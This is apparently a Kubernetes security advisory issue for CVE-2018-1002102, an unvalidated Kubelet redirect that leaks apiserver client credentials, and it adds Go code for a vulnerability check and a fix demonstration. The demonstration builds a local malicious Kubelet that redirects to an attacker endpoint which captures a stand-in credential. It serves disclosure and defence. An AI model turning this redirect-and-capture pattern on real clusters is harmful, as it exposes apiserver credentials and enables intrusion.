
CVE-2018-1002102: Unvalidated redirect #85867

Closed
@tallclair

Description


CVSS Rating: CVSS:3.0/AV:N/AC:H/PR:H/UI:R/S:C/C:L/I:N/A:N/E:F (Low)

An attacker-controlled Kubelet can return an arbitrary redirect when responding to certain apiserver requests (the proxied container streaming requests covered by the StreamingProxyRedirects feature). Impacted kube-apiservers follow the redirect as a GET request and present the client-certificate credentials they use to authenticate to the Kubelet, so those credentials are sent to whatever host the redirect names.

Am I vulnerable?

Kubernetes API servers with the StreamingProxyRedirects feature gate enabled AND the ValidateProxyRedirects feature gate disabled are affected.

API servers that reach Kubelets over SSH tunnels (--ssh-user / --ssh-keyfile) are not affected.

Using the default feature gate values, kube-apiserver versions before v1.14 are affected (ValidateProxyRedirects is enabled by default from v1.14).
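As an added check (example code written for this page, not part of Kubernetes), the following Go program applies the rule above to a kube-apiserver version and command line: it parses --feature-gates, looks for the SSH tunnel flags, and reports whether the server is in the affected configuration. The gate defaults it falls back on when --feature-gates is absent are assumptions of the example: StreamingProxyRedirects on in all versions, ValidateProxyRedirects off before v1.14 and on from v1.14, and no ValidateProxyRedirects gate to enable before v1.10. The argv samples in main are constructed.

```go
package main

import (
	"fmt"
	"strconv"
	"strings"
)

// parseMinor returns the minor number of a 1.x version string such as "v1.13.4".
func parseMinor(version string) (int, error) {
	parts := strings.SplitN(strings.TrimPrefix(version, "v"), ".", 3)
	if len(parts) < 2 || parts[0] != "1" {
		return 0, fmt.Errorf("unsupported version %q", version)
	}
	return strconv.Atoi(parts[1])
}

// parseFeatureGates parses a --feature-gates value of the form "A=true,B=false".
func parseFeatureGates(spec string) (map[string]bool, error) {
	gates := map[string]bool{}
	for _, entry := range strings.Split(spec, ",") {
		if strings.TrimSpace(entry) == "" {
			continue
		}
		kv := strings.SplitN(entry, "=", 2)
		if len(kv) != 2 {
			return nil, fmt.Errorf("malformed feature gate %q", entry)
		}
		value, err := strconv.ParseBool(strings.TrimSpace(kv[1]))
		if err != nil {
			return nil, fmt.Errorf("feature gate %q: %w", entry, err)
		}
		gates[strings.TrimSpace(kv[0])] = value
	}
	return gates, nil
}

// flagValue returns the value of --name from argv, accepting "--name=v" and "--name v".
func flagValue(args []string, name string) (string, bool) {
	for i, arg := range args {
		if strings.HasPrefix(arg, name+"=") {
			return strings.TrimPrefix(arg, name+"="), true
		}
		if arg == name && i+1 < len(args) {
			return args[i+1], true
		}
	}
	return "", false
}

// assess applies the advisory's rule to one kube-apiserver: affected when
// StreamingProxyRedirects is on, ValidateProxyRedirects is off, and Kubelet
// traffic does not go over SSH tunnels. The defaults used when the flag is
// absent are assumptions of this example (not taken from the advisory):
// StreamingProxyRedirects on in all versions, ValidateProxyRedirects off
// before v1.14 and on from v1.14, and no ValidateProxyRedirects gate before v1.10.
func assess(version string, args []string) (bool, string, error) {
	minor, err := parseMinor(version)
	if err != nil {
		return false, "", err
	}
	streaming, validate := true, minor >= 14
	if spec, ok := flagValue(args, "--feature-gates"); ok {
		gates, perr := parseFeatureGates(spec)
		if perr != nil {
			return false, "", perr
		}
		if v, ok := gates["StreamingProxyRedirects"]; ok {
			streaming = v
		}
		if v, ok := gates["ValidateProxyRedirects"]; ok && minor >= 10 {
			validate = v
		}
	}
	_, sshUser := flagValue(args, "--ssh-user")
	_, sshKey := flagValue(args, "--ssh-keyfile")
	switch {
	case sshUser || sshKey:
		return false, "not affected: Kubelet traffic uses SSH tunnels", nil
	case !streaming:
		return false, "not affected: StreamingProxyRedirects is disabled", nil
	case validate:
		return false, "not affected: ValidateProxyRedirects is enabled", nil
	default:
		return true, "affected: Kubelet redirects are followed without host validation", nil
	}
}

func main() {
	// Constructed argv samples standing in for `ps -o args= -C kube-apiserver` output.
	samples := map[string][]string{
		"v1.12.3": {"kube-apiserver", "--etcd-servers=https://127.0.0.1:2379"},
		"v1.13.4": {"kube-apiserver", "--feature-gates=ValidateProxyRedirects=true"},
		"v1.14.0": {"kube-apiserver"},
	}
	for version, args := range samples {
		affected, reason, err := assess(version, args)
		fmt.Printf("%s: affected=%v %s %v\n", version, affected, reason, err)
	}
}
```

Feed it the version from `kube-apiserver --version` and the live argv of the process; an explicit ValidateProxyRedirects=true on a server older than v1.10 is deliberately not trusted, since the gate does not exist there.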

How do I mitigate this vulnerability?

For Kubernetes versions >= v1.10.0, the ValidateProxyRedirects feature gate can be enabled manually with the kube-apiserver flag --feature-gates=ValidateProxyRedirects=true.

Fix impact

The ValidateProxyRedirects feature causes the kube-apiserver to check that a redirect returned by a Kubelet points at the same host the original request was sent to. If nodes are configured to answer CRI streaming requests on a different host interface than the one the apiserver addresses (only the case when not using the built-in dockershim and setting the kubelet flag --redirect-container-streaming=true), those requests will break. In that case the feature can be temporarily disabled until the node configuration is corrected. We suggest setting --redirect-container-streaming=false on the kubelet to avoid the issue.
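To make the fix concrete, here is an added Go example (written for this page, not the kube-apiserver's own proxy code) of the same-host check applied to a Kubelet redirect. It drives the check through a constructed malicious "Kubelet" and attacker endpoint built on httptest; the X-Demo-Credential header stands in for the apiserver's client certificate, and all URLs and server names are constructed for the demonstration.

```go
package main

import (
	"errors"
	"fmt"
	"net/http"
	"net/http/httptest"
	"net/url"
)

// ErrCrossHostRedirect is returned when a redirect would leave the host the
// proxied request was originally sent to.
var ErrCrossHostRedirect = errors.New("redirect to a different host rejected")

// validateRedirect resolves a Location header against the URL the request was
// sent to. requireSameHost=true models the ValidateProxyRedirects check: a
// target whose host (including port) differs from the original is rejected.
// requireSameHost=false models the pre-fix behaviour: any target is accepted.
func validateRedirect(original *url.URL, location string, requireSameHost bool) (*url.URL, error) {
	loc, err := url.Parse(location)
	if err != nil {
		return nil, fmt.Errorf("invalid Location %q: %w", location, err)
	}
	target := original.ResolveReference(loc) // a relative Location stays on the original host
	if requireSameHost && target.Host != original.Host {
		return nil, fmt.Errorf("%w: expected %s, found %s", ErrCrossHostRedirect, original.Host, target.Host)
	}
	return target, nil
}

// noFollow hands 3xx responses back to the caller instead of following them.
var noFollow = &http.Client{
	CheckRedirect: func(*http.Request, []*http.Request) error { return http.ErrUseLastResponse },
}

// proxyExec mimics the apiserver proxying a streaming request to a Kubelet:
// send it, and if the Kubelet redirects, re-issue the request as a GET to the
// redirect target carrying the same credential. The X-Demo-Credential header
// is a constructed stand-in for the apiserver's Kubelet client certificate.
func proxyExec(target, credential string, requireSameHost bool) (*http.Response, error) {
	req, err := http.NewRequest(http.MethodPost, target, nil)
	if err != nil {
		return nil, err
	}
	req.Header.Set("X-Demo-Credential", credential)
	resp, err := noFollow.Do(req)
	if err != nil {
		return nil, err
	}
	if resp.StatusCode < 300 || resp.StatusCode > 399 {
		return resp, nil
	}
	location := resp.Header.Get("Location")
	resp.Body.Close()
	next, err := validateRedirect(req.URL, location, requireSameHost)
	if err != nil {
		return nil, err // rejected before anything is sent to the redirect target
	}
	follow, err := http.NewRequest(http.MethodGet, next.String(), nil)
	if err != nil {
		return nil, err
	}
	follow.Header.Set("X-Demo-Credential", credential)
	return noFollow.Do(follow)
}

// demoServers starts two constructed endpoints: an attacker host that records
// the credential it receives, and a malicious "Kubelet" that answers every
// request with a 302 to the attacker. The caller closes both servers.
func demoServers() (kubelet, attacker *httptest.Server, captured *string) {
	got := ""
	attacker = httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		got = r.Header.Get("X-Demo-Credential")
	}))
	kubelet = httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		http.Redirect(w, r, attacker.URL+"/steal", http.StatusFound)
	}))
	return kubelet, attacker, &got
}

func main() {
	kubelet, attacker, captured := demoServers()
	defer kubelet.Close()
	defer attacker.Close()
	execURL := kubelet.URL + "/exec/default/shell/sh"

	// Pre-fix: the redirect is followed and the credential reaches the attacker.
	if resp, err := proxyExec(execURL, "apiserver-client-cert", false); err == nil {
		resp.Body.Close()
	}
	fmt.Printf("without ValidateProxyRedirects: attacker received %q\n", *captured)

	// With the check: the cross-host redirect is refused and nothing is sent.
	*captured = ""
	_, err := proxyExec(execURL, "apiserver-client-cert", true)
	fmt.Printf("with ValidateProxyRedirects: %v; attacker received %q\n", err, *captured)
}
```

The comparison is on url.URL.Host, so in this example a redirect to the same address on a different port is refused as well; that is the kind of node setup (streaming served on another interface) that the paragraph above says the check will break, and why the kubelet-side --redirect-container-streaming=false is the cleaner fix.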

Fixed Versions

Additional Details

In a future release, we plan to deprecate the StreamingProxyRedirects feature, instead handling the redirection locally in the Kubelet. Once the deprecation is complete, we can remove apiserver redirect handling entirely (at least for Kubelet requests).

Acknowledgements

This vulnerability was reported by Alban Crequy.

/area security
/kind bug
/committee product-security
/sig api-machinery node
/area apiserver

/close

    Labels

    area/apiserver
    area/security
    committee/security-response (denotes an issue or PR intended to be handled by the product security committee)
    kind/bug (categorizes issue or PR as related to a bug)
    official-cve-feed (issues or PRs related to CVEs officially announced by the Security Response Committee (SRC))
    sig/api-machinery (categorizes an issue or PR as relevant to SIG API Machinery)
    sig/node (categorizes an issue or PR as relevant to SIG Node)
